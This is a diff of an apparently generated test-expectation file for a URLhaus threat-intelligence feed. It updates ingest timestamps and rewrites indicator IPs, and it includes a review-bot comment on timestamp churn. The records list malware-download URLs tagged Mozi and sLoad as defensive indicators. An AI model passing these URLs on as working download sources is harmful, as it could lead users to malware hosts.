listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2321,18 +2321,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.107:43973/Mozi.m", + "original": "http://89.160.20.156:43973/Mozi.m", "scheme": "http", "port": 43973, - "domain": "186.33.104.107", - "full": "http://186.33.104.107:43973/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43973/Mozi.m" }, - "ip": "186.33.104.107" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692652107Z", - "original": "{\"id\":\"961502\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961502/\",\"url\":\"http://186.33.104.107:43973/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.107\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024805700Z", + "original": "{\"id\":\"961502\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961502/\",\"url\":\"http://89.160.20.156:43973/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2370,18 +2370,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://85.105.16.154:41319/Mozi.m", + "original": "http://89.160.20.156:41319/Mozi.m", "scheme": "http", "port": 41319, - "domain": "85.105.16.154", - "full": "http://85.105.16.154:41319/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41319/Mozi.m" }, - "ip": "85.105.16.154" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692655784Z", - "original": "{\"id\":\"961503\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961503/\",\"url\":\"http://85.105.16.154:41319/Mozi.m\",\"url_status\":\"online\",\"host\":\"85.105.16.154\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024812800Z", + "original": "{\"id\":\"961503\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961503/\",\"url\":\"http://89.160.20.156:41319/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2419,18 +2419,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://178.141.73.115:51847/Mozi.a", + "original": "http://89.160.20.156:51847/Mozi.a", "scheme": "http", "port": 51847, - "domain": "178.141.73.115", - "full": "http://178.141.73.115:51847/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51847/Mozi.a" }, - "ip": "178.141.73.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692659561Z", - "original": "{\"id\":\"961496\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961496/\",\"url\":\"http://178.141.73.115:51847/Mozi.a\",\"url_status\":\"online\",\"host\":\"178.141.73.115\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024819800Z", + "original": "{\"id\":\"961496\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961496/\",\"url\":\"http://89.160.20.156:51847/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2468,18 +2468,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.135:54469/Mozi.m", + "original": "http://89.160.20.156:54469/Mozi.m", "scheme": "http", "port": 54469, - "domain": "186.33.104.135", - "full": "http://186.33.104.135:54469/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54469/Mozi.m" }, - "ip": "186.33.104.135" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692663779Z", - "original": "{\"id\":\"961497\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961497/\",\"url\":\"http://186.33.104.135:54469/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.135\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024826900Z", + "original": "{\"id\":\"961497\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961497/\",\"url\":\"http://89.160.20.156:54469/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2517,18 +2517,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.56.159.43:34547/Mozi.m", + "original": "http://89.160.20.156:34547/Mozi.m", "scheme": "http", "port": 34547, - "domain": "115.56.159.43", - "full": "http://115.56.159.43:34547/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34547/Mozi.m" }, - "ip": "115.56.159.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692667216Z", - "original": "{\"id\":\"961498\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961498/\",\"url\":\"http://115.56.159.43:34547/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.56.159.43\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024833900Z", + "original": "{\"id\":\"961498\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961498/\",\"url\":\"http://89.160.20.156:34547/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2566,18 +2566,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.138.170:33932/Mozi.m", + "original": "http://89.160.20.156:33932/Mozi.m", "scheme": "http", "port": 33932, - "domain": "42.230.138.170", - "full": "http://42.230.138.170:33932/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33932/Mozi.m" }, - "ip": "42.230.138.170" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692670432Z", - "original": "{\"id\":\"961499\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961499/\",\"url\":\"http://42.230.138.170:33932/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.138.170\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024840800Z", + "original": "{\"id\":\"961499\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961499/\",\"url\":\"http://89.160.20.156:33932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2622,7 +2622,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692673748Z", + "ingested": "2021-12-13T08:40:08.024847800Z", "original": "{\"id\":\"961494\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961494/\",\"url\":\"https://univirtek.com/viro/02478080035/blank.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2668,7 +2668,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692676804Z", + "ingested": "2021-12-13T08:40:08.024854700Z", "original": "{\"id\":\"961495\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961495/\",\"url\":\"https://univirtek.com/viro/FRRNDR77C25D325O/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2714,7 +2714,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692680110Z", + "ingested": "2021-12-13T08:40:08.024861500Z", "original": "{\"id\":\"961492\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961492/\",\"url\":\"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
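Review bot: The only change in these three hunks is `event.ingested`, which is stamped at generation time and will keep churning this file on every regeneration without any pipeline change, making real expectation changes harder to spot in review. If the data stream's pipeline test config does not already list `event.ingested` under `dynamic_fields`, it should, so comparisons ignore the value; that config file is outside this chunk, so I cannot confirm either way. The mix of nine- and six-digit fractional seconds in the new timestamps (trailing zeros trimmed) is harmless but is another sign the value is never normalised.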
@@ -2760,7 +2760,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692683396Z", + "ingested": "2021-12-13T08:40:08.024868500Z", "original": "{\"id\":\"961493\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961493/\",\"url\":\"https://letonguesc.com/leto/02328510512/logo.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2806,7 +2806,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692687073Z", + "ingested": "2021-12-13T08:40:08.024875500Z", "original": "{\"id\":\"961490\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961490/\",\"url\":\"https://cxminute.com/minu/MLILSN74B21E507L/uk.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2852,7 +2852,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692690720Z", + "ingested": "2021-12-13T08:40:08.024882300Z", "original": "{\"id\":\"961491\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961491/\",\"url\":\"https://cxminute.com/minu/12875710159/blank.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -2898,7 +2898,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692694537Z", + "ingested": "2021-12-13T08:40:08.024892900Z", "original": "{\"id\":\"961489\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961489/\",\"url\":\"https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2944,7 +2944,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692697793Z", + "ingested": "2021-12-13T08:40:08.024900100Z", "original": "{\"id\":\"961488\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961488/\",\"url\":\"https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2990,7 +2990,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692701139Z", + "ingested": "2021-12-13T08:40:08.024907Z", "original": "{\"id\":\"961487\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961487/\",\"url\":\"https://belfetproduction.com/bella/01844510469/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3036,7 +3036,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692704396Z", + "ingested": "2021-12-13T08:40:08.024913900Z", "original": "{\"id\":\"961485\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961485/\",\"url\":\"https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3082,7 +3082,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692707812Z", + "ingested": "2021-12-13T08:40:08.024920900Z", "original": "{\"id\":\"961486\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961486/\",\"url\":\"https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3128,7 +3128,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692711639Z", + "ingested": "2021-12-13T08:40:08.024927800Z", "original": "{\"id\":\"961482\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961482/\",\"url\":\"https://univirtek.com/viro/06389650018/it.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3174,7 +3174,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692715376Z", + "ingested": "2021-12-13T08:40:08.024934800Z", "original": "{\"id\":\"961483\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961483/\",\"url\":\"https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3220,7 +3220,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692718863Z", + "ingested": "2021-12-13T08:40:08.024941800Z", "original": "{\"id\":\"961484\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961484/\",\"url\":\"https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3266,7 +3266,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692722359Z", + "ingested": "2021-12-13T08:40:08.024948900Z", "original": "{\"id\":\"961480\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961480/\",\"url\":\"https://univirtek.com/viro/SBNPQL78A24A783E/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3312,7 +3312,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692726176Z", + "ingested": "2021-12-13T08:40:08.024955700Z", "original": "{\"id\":\"961481\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961481/\",\"url\":\"https://cxminute.com/minu/15578761007/maps.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3358,7 +3358,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692729823Z", + "ingested": "2021-12-13T08:40:08.024962700Z", "original": "{\"id\":\"961478\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961478/\",\"url\":\"https://univirtek.com/viro/03079590133/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3404,7 +3404,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692733560Z", + "ingested": "2021-12-13T08:40:08.024969500Z", "original": "{\"id\":\"961479\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961479/\",\"url\":\"https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3450,7 +3450,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692736937Z", + "ingested": "2021-12-13T08:40:08.024976500Z", "original": "{\"id\":\"961476\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961476/\",\"url\":\"https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3496,7 +3496,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692740664Z", + "ingested": "2021-12-13T08:40:08.024983500Z", "original": "{\"id\":\"961477\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961477/\",\"url\":\"https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3542,7 +3542,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692744250Z", + "ingested": "2021-12-13T08:40:08.024990300Z", "original": "{\"id\":\"961470\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961470/\",\"url\":\"https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3588,7 +3588,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692747647Z", + "ingested": "2021-12-13T08:40:08.024997400Z", "original": "{\"id\":\"961471\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961471/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3634,7 +3634,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692751063Z", + "ingested": "2021-12-13T08:40:08.025004500Z", "original": "{\"id\":\"961472\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961472/\",\"url\":\"https://belfetproduction.com/bella/05739900487/1x1.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3680,7 +3680,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692754470Z", + "ingested": "2021-12-13T08:40:08.025011400Z", "original": "{\"id\":\"961473\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961473/\",\"url\":\"https://belfetproduction.com/bella/01767180597/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3726,7 +3726,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692757956Z", + "ingested": "2021-12-13T08:40:08.025018400Z", "original": "{\"id\":\"961474\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961474/\",\"url\":\"https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3772,7 +3772,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692761262Z", + "ingested": "2021-12-13T08:40:08.025025200Z", "original": "{\"id\":\"961475\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961475/\",\"url\":\"https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3818,7 +3818,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692764739Z", + "ingested": "2021-12-13T08:40:08.025032300Z", "original": "{\"id\":\"961468\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961468/\",\"url\":\"https://cxminute.com/minu/08035410722/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -3864,7 +3864,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692767885Z", + "ingested": "2021-12-13T08:40:08.025039200Z", "original": "{\"id\":\"961469\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961469/\",\"url\":\"https://univirtek.com/viro/GRNZEI60M13G346L/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3910,7 +3910,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692771642Z", + "ingested": "2021-12-13T08:40:08.025046300Z", "original": "{\"id\":\"961467\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961467/\",\"url\":\"https://letonguesc.com/leto/03253350239/1x1.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 